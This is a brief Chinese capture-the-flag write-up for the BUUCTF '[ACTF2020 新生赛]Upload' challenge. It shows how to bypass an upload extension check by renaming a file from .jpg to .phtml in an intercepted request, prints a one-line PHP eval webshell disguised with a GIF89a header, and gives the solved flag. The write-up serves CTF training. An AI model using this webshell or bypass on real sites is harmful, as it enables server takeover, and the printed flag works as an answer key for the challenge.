BUU-WEB-[ACTF2020 新生赛]Upload

Posted TzZzEZ-web

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BUU-WEB-[ACTF2020 新生赛]Upload相关的知识,希望对你有一定的参考价值。

[ACTF2020 新生赛]Upload

在这里插入图片描述

在这里插入图片描述
文件上传漏洞,上传一句话木马,再尝试用蚁剑或者菜刀连接。
尝试上传一张图片。
在这里插入图片描述
找到了上传保存的位置,接下来开始抓包,改后缀。
先把一句话木马的后缀改成jpg格式(目的是为了绕过checkfile()函数),抓包时再修改成phtml格式。
一句话木马为:

GIF89a? 
<script language="php">eval($_REQUEST[shell])</script>

在这里插入图片描述
成功上传后可以正常访问到。
在这里插入图片描述
然后开始蚁剑连接。
在这里插入图片描述
在这里插入图片描述

flag{0bceba58-6067-4cbd-8793-77644b417840}

以上是关于BUU-WEB-[ACTF2020 新生赛]Upload的主要内容,如果未能解决你的问题,请参考以下文章

[ACTF2020 新生赛]

ACTF2020 新生赛 Upload

Buuctf-Web-[ACTF2020 新生赛]Include

BUUCTF-[ACTF2020 新生赛]Exec 记录

[ACTF2020 新生赛]Include

[ACTF2020 新生赛]Include